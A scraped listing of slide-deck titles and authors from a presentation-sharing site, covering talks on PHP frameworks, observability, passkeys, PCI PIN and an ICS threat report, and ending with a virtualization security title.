Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 

Recently uploaded (20)

The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 

Virtualization security and threat